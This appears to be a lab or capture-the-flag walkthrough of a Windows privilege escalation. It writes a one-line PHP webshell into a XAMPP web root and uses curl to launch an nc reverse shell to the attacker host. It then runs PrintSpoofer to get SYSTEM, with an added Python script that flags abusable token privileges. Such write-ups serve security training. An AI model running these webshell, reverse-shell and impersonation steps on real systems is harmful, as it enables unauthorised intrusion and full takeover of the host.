Priv Esc
PS C:\xampp\htdocs> echo meow > catz.txt
PS C:\xampp\htdocs> dir

    Directory: C:\xampp\htdocs

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        7/13/2021   3:18 AM                assets
d-----        7/13/2021   3:18 AM                css
d-----        7/13/2021   3:18 AM                js
d-----        9/21/2024   5:20 AM                uploads
-a----        9/21/2024   5:45 AM             14 catz.txt
-a----         7/7/2021  10:53 AM           9635 index.php
-a----         7/7/2021   9:56 AM            835 upload.php
Write permission to C:\xampp\htdocs is confirmed (catz.txt was created), so a PHP file dropped into the web root is executed by the web server. Below, cmd.php (a one-line webshell that passes the cmd GET parameter to shell_exec) and nc.exe are staged on the attacker box (192.168.45.239) with a Python HTTP server, fetched onto the target from the existing shell, and the webshell is then used to launch an nc reverse shell back to port 1337. A listener on that port (e.g. nc -lvnp 1337) has to be running on the attacker side before the curl request is sent.
$ echo "<?php echo shell_exec(\$_GET['cmd']); ?>" > cmd.php
$ python -m http.server 80
PS C:\xampp\htdocs> powershell iwr http://192.168.45.239/cmd.php -o C:\xampp\htdocs\cmd.php
PS C:\xampp\htdocs> powershell iwr http://192.168.45.239/nc.exe -o C:\xampp\htdocs\nc.exe
$ curl 'http://192.168.219.169/cmd.php?cmd=nc.exe+192.168.45.239+1337+-e+powershell.exe'
PS C:\xampp\htdocs> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
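A small triage script, added as an example (not part of the original notes), that parses whoami /priv output like the block above and flags the privileges that typically lead straight to SYSTEM. WHOAMI_PRIV is a copy of the output above; the privilege-to-technique table is my own summary, not something the page states. Note that Disabled in this output means the privilege is held but not currently enabled in the token; the process can enable it itself, so it is still reported.

```python
"""Triage of `whoami /priv` output: which held privileges give a path to SYSTEM.

Added example, not part of the original notes. WHOAMI_PRIV is a copy of the
output above; the privilege-to-technique map is my own summary.
"""
import re

WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeTcbPrivilege                Act as part of the operating system       Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that on their own are usually enough to reach SYSTEM, with the
# technique that abuses them. The two impersonation privileges are what
# PrintSpoofer and the Potato family require.
DANGEROUS = {
    "SeImpersonatePrivilege": "named-pipe/token impersonation (PrintSpoofer, *Potato)",
    "SeAssignPrimaryTokenPrivilege": "token impersonation (PrintSpoofer, *Potato)",
    "SeDebugPrivilege": "open/inject into SYSTEM processes, dump LSASS",
    "SeBackupPrivilege": "read any file (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file (service binaries, DLL hijacks)",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the OS",
}

_PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$")


def parse_privs(text: str) -> dict:
    """Map privilege name -> 'Enabled' | 'Disabled' from whoami /priv output."""
    privs = {}
    for line in text.splitlines():
        m = _PRIV_LINE.match(line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage(text: str) -> list:
    """Return (privilege, state, technique) for every dangerous privilege held.

    'Disabled' only means the privilege is not currently enabled in the token;
    the process can enable it itself with AdjustTokenPrivileges, so disabled
    privileges are reported too.
    """
    privs = parse_privs(text)
    return [(name, state, DANGEROUS[name]) for name, state in privs.items() if name in DANGEROUS]


def impersonation_possible(text: str) -> bool:
    """True if PrintSpoofer-style impersonation is an option on this token."""
    privs = parse_privs(text)
    return "SeImpersonatePrivilege" in privs or "SeAssignPrimaryTokenPrivilege" in privs


if __name__ == "__main__":
    for name, state, how in triage(WHOAMI_PRIV):
        print(f"{name:<32} {state:<9} {how}")
    print("PrintSpoofer applicable:", impersonation_possible(WHOAMI_PRIV))
```

A positive impersonation_possible() result is necessary but not sufficient for PrintSpoofer, which also needs the Print Spooler service running on the target because it uses the spooler's named-pipe callback as its trigger; if the spooler is stopped, other tools in the Potato family abuse the same privilege through different services.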
SeImpersonatePrivilege is enabled, so a named-pipe impersonation tool (PrintSpoofer) can coerce a SYSTEM service into connecting to a pipe we control and spawn a SYSTEM shell from the impersonated token.
PS C:\programdata> curl 192.168.45.239/PrintSpoofer64.exe -o PrintSpoofer64.exe
PS C:\programdata> .\PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.2029]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
04b7788851f994eb3bc90d64addd838c

C:\Windows\system32>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::3c74:df45:acab:f118%5
IPv4 Address. . . . . . . . . . . : 192.168.219.169
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.219.254